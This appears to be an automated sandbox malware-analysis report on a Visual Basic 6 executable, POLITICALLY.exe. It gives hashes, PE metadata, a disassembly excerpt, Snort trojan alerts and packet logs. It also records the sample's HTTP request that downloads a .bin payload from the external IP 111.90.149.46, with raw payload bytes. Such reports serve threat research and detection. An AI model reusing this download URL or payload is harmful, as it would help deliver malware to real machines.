Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.19678454383093
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	POLITICALLY.exe
File size:	225280
MD5:	80b3365808440838596864bd6d492c02
SHA1:	ea14e621d263a3754234a65bc76cff61bf9eceab
SHA256:	8d6f73da5150cd26789a9a0e0643f69b520306680523d91cb21438ad2e6fa80c
SHA512:	099d2a0694b12a503b8af3e192dc620b5902a76ceb0d353e7fdd1d8324e9309a32c5982360c1f83cd5c0f8e8671556764cb832e43d25d2fa6c1a5d9bef188dbc
SSDEEP:	768:OAXQMQNI4JuxzJ4j7gazx8RazCmE9ejxvZZHlPbUlmFZ2/5Pj3KZhmOwk/Z2ZOqk:HQE67XsaGeBnVYlmO/tKZcnOYaUHfwH
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........I....................................Rich............................PE..L...z9.V.................@...0......l........P....@

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x40186c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5617397A [Fri Oct 9 03:50:18 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	263c7af0bbeabd79b6d008518dc45217

Entrypoint Preview

Instruction
push 00401D18h
call 00007FDAB4B190F5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx-003A59BAh], bh
dec esi
mov ch, 4Ah
scasd
or ax, 0000F3CFh
fyl2xp1
adc eax, 00000000h
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
inc edx
add byte ptr [esi], al
push eax
add dword ptr [edx], 70h
jc 00007FDAB4B19171h
jo 00007FDAB4B19163h
imul ebp, dword ptr [bp+65h], B4000073h
dec ebp
jno 00007FDAB4B19104h
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
or byte ptr [edi], cl
jnbe 00007FDAB4B1912Eh
adc byte ptr [esi-5EBA1FE9h], FFFFFFD0h
mov cl, AEh
xchg eax, edi
or eax, ecx
add ah, byte ptr [eax-74h]
mov edx, A94DAC2Ch
mov eax, 5CDE5CBFh
xor eax, AD4F3A6Dh
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
retf 0001h
add byte ptr [edi+00h], bl
add byte ptr [eax], al
add byte ptr [ebx], dl
add byte ptr [edx+61h], al
popad
popad
jc 00007FDAB4B19166h
jnc 00007FDAB4B1916Eh
push 0000006Ch
imul esp, dword ptr [edi+68h], 00736465h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x33f04	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x37000	0x9c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x238	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1ac	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3358c	0x34000	False	0.186218261719	data	4.29411829073	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x35000	0x1604	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x37000	0x9c8	0x1000	False	0.17919921875	data	2.17499641936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x37898	0x130	data
RT_ICON	0x375b0	0x2e8	data
RT_ICON	0x37488	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x37458	0x30	data
RT_VERSION	0x37150	0x308	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaLateMemSt, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, __vbaObjVar, _adj_fpatan, __vbaR4Var, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaVarMul, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaVarErrI4, __vbaFPException, __vbaStrVarVal, __vbaDateVar, __vbaI2Var, _CIlog, __vbaFileOpen, __vbaVarLateMemCallLdRf, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaLateMemCall, __vbaVarDup, __vbaStrComp, __vbaVarLateMemCallLd, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, __vbaAryCopy, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	Gitrama Digt
InternalName	POLITICALLY
FileVersion	7.04.0005
CompanyName	Gitrama Digt
LegalTrademarks	Gitrama Digt
ProductName	Gitrama Digt
ProductVersion	7.04.0005
FileDescription	Gitrama Digt
OriginalFilename	POLITICALLY.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/11/21-20:43:41.179404	TCP	2018752	ET TROJAN Generic .bin download from Dotted Quad	49744	80	192.168.2.6	111.90.149.46
05/11/21-20:44:37.748915	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49759	99.83.154.118	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 11, 2021 20:43:40.959551096 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.175250053 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.178649902 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.179404020 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.396996021 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.397047997 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.397064924 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.397084951 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.397090912 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.397100925 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.397118092 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.397131920 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.397135019 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.397154093 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.397172928 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.397190094 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.397192001 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.397257090 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.397270918 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.614077091 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.614115953 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.614140987 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.614190102 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.614252090 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.614274025 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.614296913 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.614327908 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.614356995 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.614526033 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.614707947 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.614732027 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.614757061 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.614787102 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.614794016 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.614850998 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.614852905 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.614902020 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.614923000 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.614945889 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.614974022 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.614990950 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.615401983 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.615430117 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.615436077 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.615454912 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.615482092 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.615497112 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.615593910 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.615621090 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.615879059 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.615952969 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.830636024 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.830676079 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.830698967 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.830722094 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.830744028 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.830760002 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.830769062 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.830792904 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.830817938 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.830838919 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.830923080 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.830974102 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.831089973 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.831106901 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.831113100 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.831135988 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.831160069 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.831182003 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.831203938 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.831224918 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.831226110 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.831229925 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.831250906 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.831274033 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.831298113 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.831319094 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.831338882 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.831372976 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.831377983 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.831422091 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.831428051 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.832262993 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.832326889 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.832345963 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.832350969 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.832371950 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.832393885 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.832415104 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.832443953 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.832489014 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.832659960 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.832776070 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.832782030 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.832799911 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.832823992 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.832889080 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.832942009 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.832959890 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.833071947 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.833084106 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.833144903 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.833195925 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.833233118 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.833373070 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.833426952 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.833450079 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.833479881 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.833544016 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.833669901 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.833715916 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.833739996 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.833761930 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:41.833771944 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:41.833801031 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.046051979 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.046081066 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.046094894 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.046111107 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.046129942 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.046252012 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.046313047 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.046341896 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.046359062 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.046371937 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.046385050 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.046439886 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.046452999 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.046478987 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.046519041 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.046536922 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.046541929 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.046581984 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.046641111 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.046894073 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.046912909 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.046930075 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.046947002 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.046962976 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047019005 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.047101974 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047122002 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047138929 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047156096 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047172070 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047175884 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.047192097 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047214031 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.047226906 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047235966 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.047266960 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047280073 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.047285080 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047301054 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047312021 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.047333002 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047350883 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.047362089 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047379017 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047384024 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.047419071 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047422886 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.047439098 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047456980 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047472000 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047487020 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.047487974 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047516108 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.047543049 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.047589064 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047607899 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047657967 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.047871113 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047889948 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.047940969 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.048024893 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.048082113 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.048172951 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.048201084 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.048237085 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.048243046 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.048260927 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.048276901 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.048286915 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.048293114 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.048312902 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.048316002 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.048330069 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.048353910 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.048360109 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.048376083 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.048382998 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.048429012 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.048429966 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.048468113 CEST	80	49744	111.90.149.46	192.168.2.6
May 11, 2021 20:43:42.048475981 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:43:42.048508883 CEST	49744	80	192.168.2.6	111.90.149.46
May 11, 2021 20:44:11.653111935 CEST	49744	80	192.168.2.6	111.90.149.46

HTTP Request Dependency Graph

111.90.149.46

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49744	111.90.149.46	80	C:\Users\user\Desktop\POLITICALLY.exe

Timestamp	kBytes transferred	Direction	Data
May 11, 2021 20:43:41.179404020 CEST	4882	OUT	GET /bin_XNLhDlJvG218.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 111.90.149.46 Cache-Control: no-cache
May 11, 2021 20:43:41.396996021 CEST	4939	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Mon, 10 May 2021 20:56:41 GMT Accept-Ranges: bytes ETag: "134b90fade45d71:0" Server: Microsoft-IIS/10.0 Date: Tue, 11 May 2021 18:43:41 GMT Content-Length: 164416 Data Raw: d1 52 55 02 7a 6a f4 c7 51 b9 85 e1 b1 3a cd 1e d3 72 7f 3e 3c 36 1d 76 f6 cd f9 2f 46 b9 bf a5 ec 28 96 05 9a 51 69 37 7f 67 d7 5b 82 b4 aa d6 f8 20 26 a8 c3 97 ac 27 79 c0 2d 97 2b f9 f4 ca 24 30 15 a5 6d f9 66 2d f5 d2 74 d8 f4 c5 0b 37 c9 23 8e a1 50 7d 03 c7 55 ee 0e 64 4d 33 17 92 c4 55 24 22 94 68 9f 98 89 36 a5 ee 94 14 fc be f2 6e 78 9b 33 71 d1 02 5f 82 93 6f 2d 2e 74 32 2c 97 19 6f 41 75 a5 2e 67 d8 f8 b1 f8 fd 9a aa 35 11 fd 7f 46 29 9e fa ee 1a 14 11 d4 26 e3 6d e4 e4 6e 2c 79 bb 9a 2a 12 5c fa 2c 06 70 32 99 ab ee 0a e3 f6 6a 34 87 0f 60 e2 42 f7 f3 72 00 bd fa 58 70 3f 0c eb 96 0a d1 f0 c9 71 49 68 f8 1f cb 48 b4 a0 d8 60 4e a4 ca 3c 16 12 36 72 f7 d8 14 74 f2 31 07 9d 5e 1e ac e2 13 45 55 18 21 bc 25 bd ac 8b 72 29 c8 35 30 ce 77 4f aa 34 6f 4f 0a b8 66 e8 de 4c 4d a1 15 dc 53 e8 63 96 7b c2 8a 83 43 12 7b ae cd 1b fb 60 08 7a 88 a6 2d e4 e6 b6 7d f0 92 6c f6 b3 5d e4 82 e8 dd f4 ea 59 3a cc 34 d4 7b f5 66 da b0 81 e4 71 a1 02 0d 4f 72 b7 73 e6 e3 91 80 cc 1a dc 4e f8 55 99 6a 7d 2e 1a cf c5 44 76 59 e1 aa 8e ca 5b 84 d2 2c 26 67 4a 93 ad c3 bd d6 ca 19 97 24 27 fb dc 53 60 c7 1d 66 b8 45 9f 44 4c d4 4a 7c 33 c6 93 e4 fd d8 3b 5d fd d5 0c 03 98 60 9a 26 23 66 93 ef ad f4 58 2f 7e 3e 95 31 82 9b f5 a3 c7 95 73 0b 69 e5 fc 24 9a 33 a3 9c e1 53 af 2e 90 f5 0c b3 aa c9 6b 90 f6 55 d6 66 51 22 22 11 03 2a 93 df 5e 34 1d 32 41 bd c7 13 a5 41 f2 8d c2 ad 13 2d be 48 69 38 f3 a0 dc 83 b7 65 b4 d8 72 0a 99 3a fd 63 ad 59 7c 68 1a 49 ea 03 f3 53 53 8e e5 19 dc eb d6 eb f0 b4 19 58 26 62 3f 09 3e 0f f8 7e 03 a7 60 81 d4 94 0d 31 b1 a6 68 bc 23 3f fd f5 31 26 d5 f8 0b e4 68 33 8c 52 21 ad 15 02 6c 13 71 be 3a 3a 42 44 f5 af 08 a0 4a e9 5e 7b bd d0 e8 33 69 56 e1 b7 d3 ac 42 40 6d fc 79 90 7f f9 65 6d 73 a8 9a c9 48 75 00 e6 db c0 63 0b 6a 87 51 4c eb 3f 91 8d f8 1a f8 54 fa fe a9 cb 81 95 65 f5 0c c5 c8 51 0d e5 02 33 88 ad 16 50 45 d9 7f 02 3d 08 93 c1 bc 4f 71 8c 27 bb 34 7c 64 1a 8b bc 7d de e5 dc 8c 33 fa ef 20 45 af c0 76 d5 8e 0b 31 a7 dc bc 57 23 4f f4 af 7f ff 97 3d 27 c8 af 77 2b d7 4e c6 20 10 74 e4 60 99 46 50 97 8e 94 b4 8a 86 7b 43 ba 8b 38 19 8e 5d 05 f8 f7 43 c6 bb 57 72 e9 eb ca ed a2 62 d6 02 a6 43 a6 21 8a 22 62 80 ae 92 04 c0 91 fa 0d 12 7d d8 6a b5 d3 82 5d f8 e7 43 2c 61 d3 2e 07 cb da a0 6b a2 1a 56 05 